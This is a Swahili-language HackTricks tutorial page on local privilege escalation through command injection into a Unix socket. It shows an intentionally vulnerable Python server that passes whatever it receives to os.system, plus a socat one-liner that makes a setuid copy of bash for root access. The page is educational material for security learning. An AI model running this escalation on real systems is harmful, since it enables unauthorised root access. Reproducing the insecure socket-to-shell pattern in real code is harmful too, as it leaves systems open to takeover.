hacktricks/linux-hardening/privilege-escalation/socket-command-injection.md
2024-02-11 02:13:58 +00:00

3.7 KiB

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Mfano wa kufunga soketi na Python

Katika mfano ufuatao, soketi ya unix inaundwa (/tmp/socket_test.s) na kila kitu kilichopokelewa kitatekelezwa na os.system. Najua kuwa hautapata hii katika mazingira ya kawaida, lakini lengo la mfano huu ni kuona jinsi namna ya kificho inavyoonekana ikitumia soketi za unix, na jinsi ya kusimamia kuingiza kwa hali mbaya kabisa.

{% code title="s.py" %}

import socket
import os, os.path
import time
from collections import deque

if os.path.exists("/tmp/socket_test.s"):
os.remove("/tmp/socket_test.s")

server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind("/tmp/socket_test.s")
os.system("chmod o+w /tmp/socket_test.s")
while True:
server.listen(1)
conn, addr = server.accept()
datagram = conn.recv(1024)
if datagram:
print(datagram)
os.system(datagram)
conn.close()

{% endcode %}

Tekeleza kificho kwa kutumia python: python s.py na angalia jinsi soketi inavyosikiliza:

netstat -a -p --unix | grep "socket_test"
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
unix  2      [ ACC ]     STREAM     LISTENING     901181   132748/python        /tmp/socket_test.s

Kuathiri

echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: